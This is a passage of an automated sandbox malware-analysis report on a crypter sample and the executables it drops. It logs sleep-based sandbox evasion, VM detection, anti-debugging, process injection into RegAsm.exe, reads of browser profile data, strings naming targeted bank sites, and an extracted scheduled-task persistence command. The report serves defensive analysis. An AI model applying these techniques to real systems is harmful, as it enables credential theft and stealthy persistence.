                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7636Thread sleep time: -300000s >= -30000sJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe TID: 7892Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe TID: 2420Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe TID: 1648Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe TID: 7944Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe TID: 4764Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe TID: 1284Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe TID: 1256Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe TID: 7284Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2368Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1172Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7520Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 2376Thread sleep time: -30000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe TID: 1760Thread sleep time: -58000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe TID: 3596Thread sleep time: -1260000s >= -30000s
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe TID: 4984Thread sleep time: -30000s >= -30000s
                              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\explorer.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00540905 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,2_2_00540905
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: 8_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,8_2_00409B78
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 300000Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 300000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exeThread delayed: delay time: 60000
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeThread delayed: delay time: 30000
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile opened: C:\Users\user\.ms-ad\Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile opened: C:\Users\user\AppData\Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile opened: C:\Users\user\AppData\Local\Google\Jump to behavior
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exeBinary or memory string: VMware
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1903774507.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2815455961.000000000132F000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1813527885.0000000001317000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.2154371709.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.000000000427F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CYCFPXIEBATTBKHGFSELOVMGNCWKTKMDAPMJOG
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000000.1618549346.0000000000887000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: memcpy after 1memcpy after 2memcpy after 3memcpy after 4memcpy after 5before zip stream oopenFailed to open zip streamzip entry open Failed to open zip entryFailed to read zip entryFailed to allocate memory%s/%sError opening fileError writing to fileopen /create /tn "ServiceData4" /tr "%s" /st 00:01 /du 9800:59 /sc once /ri 1 /fschtasks.exeCapCutVisual Studio Setup\ProfilesRoaming\Profiles\imloifkgjagghnncjkhggdhalmcnfklkContent-Type: multipart/form-data; boundary=----Boundary%luDriverPack Notifier.configPotPlayerMini64GRETECHwebview2BeamNG.driveSoftware Reporter ToolVMwareFree_PDF_SolutionsPanasonicProtectUserBenchmarkStreamingVideoProviderdiscordJackbox Gamescwd_globalDocker Desktop.dockerDocker1
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1903774507.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2815455961.000000000132F000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1813527885.0000000001317000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWyP
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                              Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeAPI call chain: ExitProcess graph end nodegraph_8-6766
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeSystem information queried: ModuleInformationJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeProcess information queried: ProcessInformationJump to behavior

                              Anti Debugging

                              barindex
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeSystem information queried: CodeIntegrityInformationJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00553C90 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00553C90
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00433130 mov eax, dword ptr fs:[00000030h]2_2_00433130
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00433130 mov eax, dword ptr fs:[00000030h]2_2_00433130
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_0260092B mov eax, dword ptr fs:[00000030h]12_2_0260092B
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_02600D90 mov eax, dword ptr fs:[00000030h]12_2_02600D90
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_026CFDD7 push dword ptr fs:[00000030h]12_2_026CFDD7
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0050CCE0 lstrlenA,GetProcessHeap,HeapAlloc,lstrcpynA,2_2_0050CCE0
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeProcess token adjusted: Debug
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeProcess created: unknown unknown
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0053FA25 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0053FA25
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00553C90 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00553C90
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00502F3D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00502F3D
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: C:\Windows\explorer.exeFile created: ahcsduh.33.drJump to dropped file
                              Source: Yara matchFile source: Process Memory Space: LeVSNPB9FLpXmtLG7mcICpEf.exe PID: 7948, type: MEMORYSTR
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3200000 protect: page execute and read and write
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeCode function: 6_2_02D421A5 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,6_2_02D421A5
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeThread created: C:\Windows\explorer.exe EIP: 8B519A8Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeThread created: unknown EIP: 70D9E4
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeNtUnmapViewOfSection: Direct from: 0x140F9991A
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeNtProtectVirtualMemory: Direct from: 0x140FDE281
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeNtClose: Direct from: 0x140FB14BD
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeNtProtectVirtualMemory: Direct from: 0x1418EC263
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeNtProtectVirtualMemory: Direct from: 0x1412CA111
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeNtProtectVirtualMemory: Direct from: 0x140FA149F
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeNtProtectVirtualMemory: Direct from: 0x1412C887B
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeNtOpenFile: Direct from: 0x140FD7A67
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeNtProtectVirtualMemory: Direct from: 0x1412CB049
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeNtProtectVirtualMemory: Direct from: 0x141027997
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeNtProtectVirtualMemory: Direct from: 0x140FE47B8
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeNtProtectVirtualMemory: Direct from: 0x1418ECF55
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeNtProtectVirtualMemory: Indirect: 0x140F85475
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeMemory written: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe base: 400000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeMemory written: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe base: 6F0000 value starts with: 4D5A
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3200000 value starts with: 4D5A
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 56C000Jump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58B000Jump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 593000Jump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 5D9000Jump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B3E008Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D4B008Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FF1008Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
